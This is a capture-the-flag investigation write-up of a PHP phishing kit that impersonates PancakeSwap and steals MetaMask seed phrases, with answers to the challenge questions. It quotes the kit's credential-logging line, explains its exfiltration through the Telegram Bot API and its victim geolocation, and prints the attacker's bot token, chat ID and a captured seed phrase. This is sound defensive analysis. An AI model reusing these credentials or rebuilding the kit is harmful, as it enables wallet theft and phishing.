Incident Investigation Report: GrabThePhisher — Dismantling a DeFi Phishing Kit
Platform: CyberDefenders Challenge: GrabThePhisher Category: Threat Intelligence Difficulty: Easy Tools: Static Code Analysis, CyberChef Achievement: Proof of Completion
1. Executive Summary
Incident Type: Credential Harvesting / Phishing
Target: Decentralized Finance (DeFi) — MetaMask / PancakeSwap Users
A decentralized finance (DeFi) platform reported unauthorized fund withdrawals from multiple user wallets. Investigation of the suspected server uncovered a phishing kit — a fully functional PHP backend — impersonating the PancakeSwap exchange. The kit was designed to trick victims into entering their 12-word MetaMask seed phrases, which were simultaneously saved locally on the server and exfiltrated in real-time via the Telegram Bot API. Three wallets had already been compromised before the kit was discovered.
Indicators of Compromise (IOCs)
| Type | Indicator | Description |
|---|---|---|
| Exfiltration Domain | api.telegram.org | Telegram Bot API used for real-time exfiltration |
| Telegram Bot Token | 5457463144:AAG8t4k7e2ew3tTiOIBShcWbSia0Irvxm10 | Attacker’s bot credential |
| Telegram Chat ID | 5442785564 | Attacker’s receiving channel |
| Threat Actor Alias | j1j1b1s@m3r0 | Developer alias found in source code comments |
| Geolocation API | http://api.sypexgeo.net/json/ | Used to profile victim locations |
| Victim Log File | ./log/log.txt | Local credential storage on compromised server |
| Compromised Seed Phrase | father also recycle embody balance concert mechanic believe owner pair muffin hockey | Most recent captured 12-word phrase |
MITRE ATT&CK Mapping Overview
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Phishing — Spearphishing Link | T1566.002 |
| Execution | Server-Side Scripting (PHP) | T1059.007 |
| Discovery | System Location Discovery via Geo API | T1614 |
| Collection | Adversary-in-the-Middle — Credential Harvesting | T1557 |
| Exfiltration | Exfiltration Over Web Service (Telegram) | T1567 |
2. Phase 1: Triage & Target Identification (Questions 1 & 2)
Objective: Identify the phishing kit’s primary target and the backend file responsible for processing stolen credentials.
Upon extracting the phishing kit archive (pankewk), the initial review was of the directory structure. Multiple frontend assets themed around PancakeSwap were present. However, one subdirectory stood out immediately:
A dedicated folder named metamask contained a complete PHP processing backend. This naming convention is deliberate — phishing kit developers structure their kits by target wallet, making it trivial to identify the intended victim profile.
Answer Q1
What cryptocurrency wallet is the phishing kit targeting?
MetaMask
Answer Q2
What is the file that is responsible for managing the phishing kit?
metamask.php
3. Phase 2: Backend Code Analysis (Questions 3 & 4)
Objective: Analyze the backend script to understand the processing language and how the kit profiles its victims.
Opening metamask.php revealed a PHP script with two key behaviors: it captures the submitted seed phrase from a form POST, and before exfiltrating it, it makes an external API call to enrich the stolen data with geographic context.
The script calls http://api.sypexgeo.net/json/ — a third-party geolocation API — using the victim’s IP ($_SERVER['REMOTE_ADDR']). This returns the victim’s country and city, which is appended to the stolen credential record before exfiltration. This profiling step helps the attacker filter out bot traffic and security researchers from their victim logs.
Analyst Note: Geolocation profiling by phishing kits is a growing trend. By filtering out IPs from known security vendor ranges or countries of no interest to the attacker, the kit can maximize the relevance of captured credentials and reduce noise in the exfiltration channel.
Answer Q3
What programming language is used to develop the kit?
PHP
Answer Q4
What service does the kit use to extract the user’s IP address details?
Sypex Geo
4. Phase 3: Victim Data Recovery (Questions 5 & 6)
Objective: Determine how many victims have been compromised and recover the most recently stolen seed phrase.
The code analysis revealed a secondary logging mechanism:
1
@file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);
This writes each captured credential set to a local text file on the compromised server. Navigating to ./log/log.txt exposed three entries — three real victims whose 12-word seed phrases were irrecoverably compromised.
Analyst Note: A 12-word seed phrase is the master key to a cryptocurrency wallet. There is no “password reset” or recovery mechanism — possession of the seed phrase means full, permanent ownership of all associated funds. Victims must be notified immediately and must transfer any remaining funds to a new wallet generated on a clean device.
Answer Q5
How many cryptocurrency wallets have been compromised so far?
3
Answer Q6
What is the crypto wallet address of the Phisher? (The most recent captured seed phrase)
father also recycle embody balance concert mechanic believe owner pair muffin hockey
5. Phase 4: Exfiltration Channel & Threat Actor Attribution (Questions 7–10)
Objective: Identify the primary exfiltration mechanism and extract threat actor credentials for attribution.
The script’s sendTel() function is where the real intelligence goldmine is:
Every seed phrase submitted by a victim triggers a Telegram API call, delivering the stolen data directly to the attacker’s private Telegram channel in real-time. The function contains two hardcoded secrets: the Bot Token and the Chat ID. Additionally, source code comments left by the developer contain their alias — a classic operational security failure.
Analyst Note: The Telegram Bot API is increasingly abused as a C2 and exfiltration channel because the traffic appears legitimate (HTTPS to api.telegram.org), is encrypted end-to-end, and is rarely blocked by corporate firewalls. Defenders should monitor web server outbound connections to
api.telegram.org— legitimate web servers have no business reason to call this endpoint.
Answer Q7
What cryptocurrency exchange is the kit impersonating?
PancakeSwap
Answer Q8
What is the phishing kit’s Telegram bot token?
5457463144:AAG8t4k7e2ew3tTiOIBShcWbSia0Irvxm10
Answer Q9
What is the phishing kit’s Telegram chat ID?
5442785564
Answer Q10
What is the identifier of the threat actor that created this kit?
j1j1b1s@m3r0
6. Conclusion
The GrabThePhisher investigation reveals a ready-made, operationally mature phishing kit targeting cryptocurrency users. Key findings:
- Target: MetaMask wallet holders lured via fake PancakeSwap pages.
- Backend: PHP script (
metamask.php) handling form submissions with victim geolocation profiling via Sypex Geo. - Dual Logging: Credentials stored locally in
log.txtAND exfiltrated in real-time via Telegram Bot API. - Scope: Three wallets compromised before detection.
- Attribution: Developer alias
j1j1b1s@m3r0exposed via code comments — a clear OPSEC failure.
Key Takeaways for the SOC:
- Phishing kits leave fingerprints: Developer aliases in source comments, hardcoded API keys, and local log files are intelligence goldmines that must be recovered during investigation.
- Telegram is the new exfiltration drop: Monitor for anomalous outbound connections from web servers to
api.telegram.org. This is never legitimate on a production web server. - File extension ≠ File type:
.jpg.phpand.pdf.exetricks remain effective. Always validate MIME types, not filenames. - Crypto theft is permanent: Unlike bank transfers, cryptocurrency transactions cannot be reversed. Incident response timelines must be treated as critical to minimize further loss.
Analysis Date: April 8, 2026 Analyst: El OMARI Zakaria